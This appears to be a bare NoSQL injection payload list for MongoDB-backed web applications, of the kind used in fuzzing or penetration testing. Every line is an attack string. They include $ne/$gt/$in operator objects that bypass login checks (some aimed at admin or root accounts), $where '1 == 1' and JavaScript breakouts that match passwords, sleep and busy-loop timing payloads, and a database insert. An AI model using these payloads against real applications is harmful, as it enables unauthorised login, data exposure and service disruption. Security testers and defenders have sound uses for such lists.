" || ""=="
' || ''=='
" || (this.username.match('^.*')) || ""=="
' || (this.username.match('^.*')) || ''=='
' || (this.username.match("^.*")) || ''=='
" || true || ""=="
' || true || ''=='
';return(true);var xyz='a
";return(true);var xyz="a
$where: '1 == 1'
$where: "1 == 1"
' && this.password.match(/.*/)//+%00
" && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
" && this.passwordzz.match(/.*/)//+%00
' || 'a'=='a
" || "a"=="a
' } ], $comment:'successful MongoDB injection'
" } ], $comment:"successful MongoDB injection"
'%20%26%26%20this.password.match(/.*/)//+%00
"%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
"%20%26%26%20this.passwordzz.match(/.*/)//+%00
', $or: [ {}, { 'a':'a
", $or: [ {}, { "a":"a
', $where: '1 == 1
", $where: "1 == 1
', $where: '1 == 1'
", $where: "1 == 1"
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
";it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
';return 'a'=='a' && ''=='
";return "a"=="a" && ""=="
';sleep(5000);
";sleep(5000);
';sleep(5000);'
";sleep(5000);"
';sleep(5000);+'
";sleep(5000);+"
, $where: '1 == 1'
, $where: "1 == 1"
0;return true
0;return truetrue, $where: '1 == 1'
0;return truetrue, $where: "1 == 1"
1, $where: '1 == 1'
1, $where: "1 == 1"
[$ne]=1
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
true, $where: '1 == 1'
true, $where: "1 == 1"
{ $ne: 1 }
{"$gt": ""}
{'$gt': ''}
{"&exists":false}
{'&exists':false}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{'username': {'$gt': undefined}, 'password': {'$gt': undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{'username': {'$gt':''}, 'password': {'$gt':''}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{'username': {'$ne': 'foo'}, 'password': {'$ne': 'bar'}}
{"username": {"$ne": null}, "password": {"$ne": null}}
{'username': {'$ne': null}, 'password': {'$ne': null}}
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
{'username':{'$in':['Admin', '4dm1n', 'admin', 'root', 'administrator']},'password':{'$gt':''}}
{$gt: ''}
{$gt: ""}
{$nin: [""]}}
{$nin: ['']}}
|| 1==1
|| 1==1%00
|| 1==1//
}, { password : /.*/ }
